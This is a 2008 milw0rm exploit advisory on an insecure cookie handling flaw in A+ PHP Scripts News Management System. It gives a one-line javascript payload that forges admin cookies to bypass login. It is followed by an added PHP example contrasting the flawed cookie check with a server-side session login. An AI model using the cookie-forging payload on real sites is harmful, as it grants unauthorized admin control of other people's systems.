####################################################################################################
# #
# ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... #
###################################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discovered By: virangar security team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
DESCRIPTION:

A+ PHP Scripts - News Management System suffers from insecure cookie handling. When an admin login is
successful, the script creates a cookie to show the rest of the admin area that the user is already
logged in. The bad thing is that the cookie doesn't contain any password or anything alike, therefore
we can craft an admin cookie and make it look like we are logged in as a legit admin.

---
exploit:
javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/";
-----
now you can get admin access and manage the cms ;)
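
The flaw class described above next to a server-side session check, as an added example that is not code from A+ PHP Scripts or from the advisory's authors. The cookie-only check is an assumed reconstruction of the reported behaviour (the script's source is not shown here); the function names, the `editor` account and its password are constructed.

```php
<?php
declare(strict_types=1);
// Added illustration, not code from A+ PHP Scripts; function names are hypothetical.

// Flawed pattern (assumed from the advisory): the admin area trusts cookies
// the browser sends, and their values are never tied to a real credential.
function is_admin_cookie_only(array $cookies): bool
{
    return !empty($cookies['mobsuser']) && !empty($cookies['mobspass']);
}

// Hardened login: verify the password against a stored hash and record the
// result server-side. In a web request $session is $_SESSION after
// session_start(); the browser then holds only an opaque session ID.
function login(array &$session, array $admins, string $user, string $pass): bool
{
    $hash = $admins[$user] ?? null;
    if ($hash === null || !password_verify($pass, $hash)) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true); // issue a new ID on privilege change
    }
    $session['admin_user'] = $user;
    return true;
}

// Hardened check: ignores request cookies entirely, reads server-side state.
function is_admin_session(array $session): bool
{
    return isset($session['admin_user']) && is_string($session['admin_user']);
}

// Constructed demo data: one admin account and the cookie names from the advisory.
$admins  = ['editor' => password_hash('constructed-demo-password', PASSWORD_DEFAULT)];
$cookies = ['mobsuser' => '1', 'mobspass' => '1'];
$session = [];

var_dump(is_admin_cookie_only($cookies));               // cookie-only check on client-set cookies
var_dump(is_admin_session($session));                   // session check before any login
var_dump(login($session, $admins, 'editor', 'wrong'));  // login attempt with a bad password
var_dump(login($session, $admins, 'editor', 'constructed-demo-password'));
var_dump(is_admin_session($session));                   // session check after a verified login
```

In a deployed application the session cookie itself should also be issued with the HttpOnly, Secure and SameSite attributes.
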
-------
young iranian h4ck3rz

# milw0rm.com [2008-06-26]